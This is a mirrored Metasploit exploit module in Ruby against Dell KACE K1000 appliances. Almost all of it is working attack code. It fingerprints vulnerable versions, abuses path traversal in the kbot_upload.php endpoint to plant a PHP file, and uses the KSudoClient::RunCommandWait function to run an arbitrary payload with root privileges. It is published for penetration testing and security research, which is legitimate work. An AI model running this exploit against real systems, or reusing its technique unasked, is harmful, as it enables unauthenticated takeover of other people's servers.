Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/http/dell_kace_k1000_upload.rb
21627 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Dell KACE K1000 File Upload',

16
        'Description' => %q{

17
          This module exploits a file upload vulnerability in Kace K1000

18
          versions 5.0 to 5.3, 5.4 prior to 5.4.76849 and 5.5 prior to 5.5.90547

19
          which allows unauthenticated users to execute arbitrary commands

20
          under the context of the 'www' user.

21


22
          This module also abuses the 'KSudoClient::RunCommandWait' function

23
          to gain root privileges.

24


25
          This module has been tested successfully with Dell KACE K1000

26
          version 5.3.

27
        },

28
        'License' => MSF_LICENSE,

29
        'Privileged' => true,

30
        'Platform' => 'unix', # FreeBSD

31
        'Arch' => ARCH_CMD,

32
        'Author' => [

33
          'Bradley Austin (steponequit)', # Initial discovery and exploit

34
          'bcoles', # Metasploit

35
        ],

36
        'References' => [

37
          ['URL', 'http://console-cowboys.blogspot.com/2014/03/the-curious-case-of-ninjamonkeypiratela.html']

38
        ],

39
        'Payload' => {

40
          'Space' => 1024,

41
          'BadChars' => "\x00\x27",

42
          'DisableNops' => true,

43
          'Compat' =>

44
                        {

45
                          'PayloadType' => 'cmd',

46
                          'RequiredCmd' => 'generic perl'

47
                        }

48
        },

49
        'DefaultTarget' => 0,

50
        'Targets' => [

51
          ['Automatic Targeting', { 'auto' => true }]

52
        ],

53
        'DisclosureDate' => '2014-03-07',

54
        'Notes' => {

55
          'Reliability' => UNKNOWN_RELIABILITY,

56
          'Stability' => UNKNOWN_STABILITY,

57
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

58
        }

59
      )

60
    )

61
  end

62


63
  def check

64
    res = send_request_cgi('uri' => normalize_uri('service', 'kbot_upload.php'))

65
    unless res

66
      vprint_error('Connection failed')

67
      return Exploit::CheckCode::Unknown

68
    end

69
    if res.code && res.code == 500 && res.headers['X-DellKACE-Appliance'].downcase == 'k1000'

70
      if res.headers['X-DellKACE-Version'] =~ /\A([0-9])\.([0-9])\.([0-9]+)\z/

71
        vprint_status("Found Dell KACE K1000 version #{res.headers['X-DellKACE-Version']}")

72
        if $1.to_i == 5 && $2.to_i <= 3                         # 5.0 to 5.3

73
          return Exploit::CheckCode::Vulnerable

74
        elsif $1.to_i == 5 && $2.to_i == 4 && $3.to_i <= 76849  # 5.4 prior to 5.4.76849

75
          return Exploit::CheckCode::Vulnerable

76
        elsif $1.to_i == 5 && $2.to_i == 5 && $3.to_i <= 90547  # 5.5 prior to 5.5.90547

77
          return Exploit::CheckCode::Vulnerable

78
        end

79


80
        return Exploit::CheckCode::Safe

81
      end

82
      return Exploit::CheckCode::Detected

83
    end

84
    Exploit::CheckCode::Safe

85
  end

86


87
  def exploit

88
    # upload payload

89
    fname = ".#{rand_text_alphanumeric(rand(8) + 5)}.php"

90
    payload_path = "/kbox/kboxwww/tmp/"

91
    post_data = "<?php require_once 'KSudoClient.class.php';KSudoClient::RunCommandWait('rm #{payload_path}#{fname};#{payload.encoded}');?>"

92
    print_status("Uploading #{fname} (#{post_data.length} bytes)")

93
    res = send_request_cgi(

94
      'uri' => normalize_uri('service', 'kbot_upload.php'),

95
      'method' => 'POST',

96
      'vars_get' => Hash[{

97
        'filename' => fname,

98
        'machineId' => "#{'../' * (rand(5) + 4)}#{payload_path}",

99
        'checksum' => 'SCRAMBLE',

100
        'mac' => rand_text_alphanumeric(rand(8) + 5),

101
        'kbotId' => rand_text_alphanumeric(rand(8) + 5),

102
        'version' => rand_text_alphanumeric(rand(8) + 5),

103
        'patchsecheduleid' => rand_text_alphanumeric(rand(8) + 5)

104
      }.to_a.shuffle],

105
      'data' => post_data

106
    )

107


108
    unless res

109
      fail_with(Failure::Unreachable, 'Connection failed')

110
    end

111


112
    if res.code && res.code == 200

113
      print_good('Payload uploaded successfully')

114
    else

115
      fail_with(Failure::UnexpectedReply, 'Unable to upload payload')

116
    end

117


118
    # execute payload

119
    res = send_request_cgi('uri' => normalize_uri('tmp', fname))

120


121
    unless res

122
      fail_with(Failure::Unreachable, 'Connection failed')

123
    end

124


125
    if res.code && res.code == 200

126
      print_good('Payload executed successfully')

127
    elsif res.code && res.code == 404

128
      fail_with(Failure::NotVulnerable, "Could not find payload '#{fname}'")

129
    else

130
      fail_with(Failure::UnexpectedReply, 'Unable to execute payload')

131
    end

132
  end

133
end

134


135